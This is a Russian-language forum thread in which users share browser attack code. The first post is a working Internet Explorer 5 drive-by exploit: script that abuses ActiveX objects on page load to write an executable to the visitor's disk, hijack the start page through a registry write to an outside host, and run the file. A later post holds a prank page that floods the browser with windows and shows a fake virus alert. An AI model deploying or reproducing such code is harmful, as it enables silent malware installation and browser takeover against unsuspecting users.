Вирус с сайта

[Гость Unregistered]

Вот этим кодои и прописовают

Сия конструкция точно работает в ИЕ 5+, и представляет собой объект доступа к реестру (sic!) на чтение и запись, а также к файлам на диске (биипing microsoft!)

То есть, фактически, можно при загрузке страницы записать ему на винт экзешку и запустить ее.

Никого не обижайте, for infomational purposes only!

========CODE STARTS HERE:========

<APPLET code=com.ms.activeX.ActiveXComponent height=0 width=0>

<PARAM NAME="code" VALUE="com.ms.activeX.ActiveXComponent">

<PARAM NAME="height" VALUE="1">

<PARAM NAME="width" VALUE="1">

<PARAM NAME="codeBase" VALUE="http://somehost.ru/"></APPLET>

<!-- ^^^ На самом деле хост не нужен, да и самого апплета не существует, но объект доступа к ресурсам несчастного юзверя создан. -->

<script language=JAVASCRIPT>

InterfaceObject=document.applets[0];

setTimeout("Upload()",1000);

function Upload() {

fsoClassID="{0D43FE01-F093-11CF-8940-00A0C9054228}";

InterfaceObject.setCLSID(fsoClassID);

fso = InterfaceObject.createInstance();

windir = fso.getspecialfolder(0);

filename = "\\exploit.exe";

file = fso.opentextfile(filename, "2", "TRUE");

file.write(FileContent);

file.close();

// Файлик записали создали, теперь запускаем.

Run();

}

function Run() {

regkey = "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page"

WshShellClassID="{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}";

InterfaceObject.setCLSID(WshShellClassID);

wshShell = InterfaceObject.createInstance();

wshShell.regwrite(regkey,"http://somehost.ru")

// Ну вот, собственно и заменили страничку юзверя путем записи в реестр. Но эт слишком примитивно, не правда ли

wshShell.run(filename,"6","TRUE");

// А теперь запустили наш свежесозданный файлик, а дальше все зависит исключительно от вашей фантазии

}

-->

</SCRIPT>

<script language=vbscript>

FileContent = array()

FileContent = "31323334"

FileContent = decode(FileContent)

Function Decode(Text)

For x = 1 To Len(Text) Step 2

thebyte = Chr(38) & "H" & Mid(Text, x, 2)

temptext = temptext & Chr(thebyte)

Next

Decode = temptext

End Function

// А эта хрень генерирует строчку, которую потом можно записать в файлик на диске пользователя и запустить его

</SCRIPT>

[Соломоныч]

Круто, однако... Хотя это можно легко предотвратить добавкой одной птицы в настройках IE, но - кто это сделает? )))

[ShaD]

Unreg а всмысле есть ещё такие , которые пользуютьмя IE 5

[Гость Unregistered]

да конечно не все же пользуются ie 6 или оперой, нетскапем и.t.д

[Filin]

JS. Exception. Exploit. Пусть пару дней повисит, потом удалю... как обещал. Без обид

[Ingreen]

Через JAVA  удаётся запустить саморазмножающийся вирус в зоне памяти браузера, что проявлюется самопроизвольным распространением окон браузера и утери контроля над ним.

vot primer (mne pri&los perezagrujat komp)

[AteshParast]

Круто, однако... Хотя это можно легко предотвратить добавкой одной птицы в настройках IE, но - кто это сделает? )))

А кто либо пробовал, работает ли этот скрипт ?

Создайте html страничку, вкллчите туда этот скрипт с безобидным файлом и откройте его. Какие все ленивые здесь.

[Гость ZAUR (do etogo postil kak unregi]

Ingreen neznayu 4to za sslka tam , no srazu ponel eto to 4to ya napisal kogda tolka izu4al js, nikakogo vreda ot etoi fi4i netu, tolka pugayut ))

vot kod vstavte v html i nazovite lol.htm a potom zapustite

for information puprpose only!!!

----------------------------------------------lol.htm--------------------------------------

<HTML><HEAD><script LANGUAGE="JavaScript">

<!-- Begin

if (this.name!='fullscreen'){

window.open(location.href,'fullscreen','fullscreen,scrollbars')

}

// End -->

</script>

<TITLE>::::::::::::::::Wanted hack Nagiev?::::::::::::::::::::</TITLE>

<META content="text/html; charset=windows-1251" http-equiv=Content-Type>

<style>

#bn {display:block;}

#bt {display:block;}

</style>

<script language="JavaScript">

<!--

function MM_popupMsg(msg) { //v1.0

alert(msg);

}

function MM_goToURL() { //v3.0

var i, args=MM_goToURL.arguments; document.MM_returnValue = false;

for (i=0; i<(args.length-1); i+=2) eval(args+".location='"+args[i+1]+"'");

}

//-->

</script>

<bgsound src="javascript:if(confirm('http://zaur.h1.ru/lol.wav \n\nThis file was not retrieved by Teleport Pro, because it was redirected to an invalid location. You should report this problem to the site\'s webmaster. \n\nDo you want to open it from the server?'))window.location='http://zaur.h1.ru/lol.wav'" tppabs="http://zaur.h1.ru/lol.wav" loop="-1">

</head>

<BODY bgColor=#000000 onload="flagRun = 1; playBall(); return true" onUnLoad="procreate();MM_popupMsg('Сканер обнаружел html вирус, пожалуйста удалите зараженные файлы!')" onfinish="MM_goToURL('parent','lol.htm');return document.MM_returnValue"><!--HOSTING BANNER NUMBER 1 INSERTED--><script>

// <!--

document.write('<font size=-3><img src="http://register.h1.ru/g/cw.gif?zaur6" height=1 width=1% border="0" name="CheckWidth" hspace=0 vspace=0>');

document.write('<img src="http://register.h1.ru/g/ch.gif?zaur6" height=1% width=1 border="0" name="CheckHeight" hspace=0 vspace=0><br clear=all></font>');

if((self.parent==self||((self.length==0)&&(document.images.CheckWidth.width>4)&&document.images.CheckHeight.height>2)))

{

var rndnum = Math.round(Math.random() * 10000);

document.write("<CENTER><A HREF='http://ad.tbn.ru/bb.cgi?cmd=go&pubid=117848&pg=1&vbn=189&num=1&w=468&h=60&nocache=" + rndnum + "' target='_top'>");

document.write("<IMG SRC='http://ad.tbn.ru/bb.cgi?cmd=ad&pubid=117848&pg=1&vbn=189&num=1&w=468&h=60&nocache=" + rndnum + "' width=468 height=60 Alt='TBN.ru - сеть живущая по правилам' border=0></A><BR>");

document.write('<A HREF="http://ad.text.tbn.ru/bb.cgi?cmd=go&pubid=2823867&pg=1&vbn=350&num=1&w=468&h=15&nocache=' + rndnum + '" target="_top">');

document.write('<IMG SRC="http://ad.text.tbn.ru/bb.cgi?cmd=ad&pubid=2823867&pg=1&vbn=350&num=1&w=468&h=15&nocache=' + rndnum + '" width=468 height=15 Alt="TBN_Text" border=0></A></CENTER>');

}

// -->

</script>

<noscript>

<CENTER><img src="javascript:if(confirm('http://register.h1.ru/g/ch.gif?zaur6 \n\nThis file was not retrieved by Teleport Pro, because it is addressed on a domain or path outside the boundaries set for its Starting Address. \n\nDo you want to open it from the server?'))window.location='http://register.h1.ru/g/ch.gif?zaur6'" tppabs="http://register.h1.ru/g/ch.gif?zaur6" height=0 width=0 border="0" hspace=0 vspace=0>

<A HREF="javascript:if(confirm('http://ad.tbn.ru/bb.cgi?cmd=go&pubid=117848&pg=1&vbn=189&num=1&w=468&h=60&nocache=2342342 \n\nThis file was not retrieved by Teleport Pro, because it is addressed on a domain or path outside the boundaries set for its Starting Address. \n\nDo you want to open it from the server?'))window.location='http://ad.tbn.ru/bb.cgi?cmd=go&pubid=117848&pg=1&vbn=189&num=1&w=468&h=60&nocache=2342342'" tppabs="http://ad.tbn.ru/bb.cgi?cmd=go&pubid=117848&pg=1&vbn=189&num=1&w=468&h=60&nocache=2342342" target='_top'>

<IMG SRC="bb.cgi-cmd=ad&pubid=117848&pg=1&vbn=189&num=1&w=468&h=60&nocache=2342342.gif" tppabs="http://ad.tbn.ru/bb.cgi?cmd=ad&pubid=117848&pg=1&vbn=189&num=1&w=468&h=60&nocache=2342342" width=468 height=60 Alt='TBN.ru - сеть живущая по правилам' border=0></A><BR>

<A HREF="javascript:if(confirm('http://ad.text.tbn.ru/bb.cgi?cmd=go&pubid=2823867&pg=1&vbn=350&num=1&w=468&h=15&nocache=5197 \n\nThis file was not retrieved by Teleport Pro, because it is addressed on a domain or path outside the boundaries set for its Starting Address. \n\nDo you want to open it from the server?'))window.location='http://ad.text.tbn.ru/bb.cgi?cmd=go&pubid=2823867&pg=1&vbn=350&num=1&w=468&h=15&nocache=5197'" tppabs="http://ad.text.tbn.ru/bb.cgi?cmd=go&pubid=2823867&pg=1&vbn=350&num=1&w=468&h=15&nocache=5197" target="_top">

<IMG SRC="2826353_24.gif" tppabs="http://ad.text.tbn.ru/bb.cgi?cmd=ad&pubid=2823867&pg=1&vbn=350&num=1&w=468&h=15&nocache=5197" width=468 height=15 Alt="TBN_Text" border=0></A></CENTER>

</noscript>

<!--HOSTING BANNER NUMBER 1 INSERT FINISHED-->

<a href="javascript:if(confirm('http://lamer.htm/ \n\nThis file was not retrieved by Teleport Pro, because it is addressed on a domain or path outside the boundaries set for its Starting Address. \n\nDo you want to open it from the server?'))window.location='http://lamer.htm/'" tppabs="http://lamer.htm/" target="_blank" onfinish="MM_goToURL('parent','lol.htm');return document.MM_returnValue" onstart="MM_popupMsg('Welcome to hell !\rall rights reseved\r©Zaur Nagiev(spider), Baku, 2002')"><img border="0" src="3.gif" tppabs="http://zaur.h1.ru/3.gif" width="217" height="61"></a>

<script language=Javascript>

<!---Hide

var xOff = 5;

var yOff = 5;

var xPos = 400;

var yPos = -100;

var flagRun = 1;

function openWindow(url){

aWindow = window.open(url,"_blank", 'menubar=no,status=no,toolbar=noresizable=no,width=180,height=175,titlebar=no,alwaysRaised=yes');

}

function procreate(){

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lolhtm');

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lol.htm');

openWindow('lol.htm');

}

function newXlt(){

xOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;

window.focus()}

function newXrt(){

xOff = Math.ceil(7 * Math.random()) * 5 - 10 ;

}

function newYup(){

yOff = Math.ceil( 0 - 6 * Math.random()) * 5 - 10 ;

}

function newYdn(){

yOff = Math.ceil( 7 * Math.random()) * 5 - 10 ;

}

function fOff(){

flagrun = 0;

}

function playBall(){

xPos += xOff;

yPos += yOff;

if (xPos > screen.width-175){

newXlt();

}

if (xPos < 0){

newXrt();

}

if (yPos > screen.height-100){

newYup();

}

if (yPos < 0){

newYdn();

}

if (flagRun == 1){

window.moveTo(xPos,yPos);

setTimeout('playBall()',1);

}

}

//Done hiding --->

</SCRIPT>

<!--<a href="" onClick="flagRun = 0; return false">stop</a><br>

<a href="" onClick="flagRun = 1; playBall(); return false">start</a>

-->

<font color="#FFFFFF" size="7">Смерт Ламеру!!!  </font>

<TABLE height="100%" width="100%">

<TBODY>

<TR>

<TD height="334" colspan="4" vAlign=top align=middle>

<p><font color="#FFFFFF">  Все права принадлежат автору</font></p>

<p><font color="#FFFFFF">  © Нагиев Заур(Spider) 2002, Баку</font></p>

<p>z <img src="Joker.jpg" tppabs="http://zaur.h1.ru/Joker.jpg" width="340" height="270"> <FONT color=lime face=Arial size=3>

<BR>

</font> </p>

</TD>

</TR>

<TR>

<TD height="54" width="1"></TD>

<TD vAlign=top colspan="2"><font color="#FFFFFF" size="7">Смерт Ламеру!!!

      Death Lamer!!!</font></TD>

<TD width="4"></TD>

</TR>

<TR>

<TD height="69"></TD>

<TD width="693" vAlign=top>

<div align="center"><font color="#FFFFFF" size="7">Goy Virus Lameri oldursun</font></div>

</TD>

<TD width="25"></TD>

<TD></TD>

</TR>

</TBODY>

</TABLE>

<img src="z.n" tppabs="a:/z.n">

[Гость Unregistered]

wda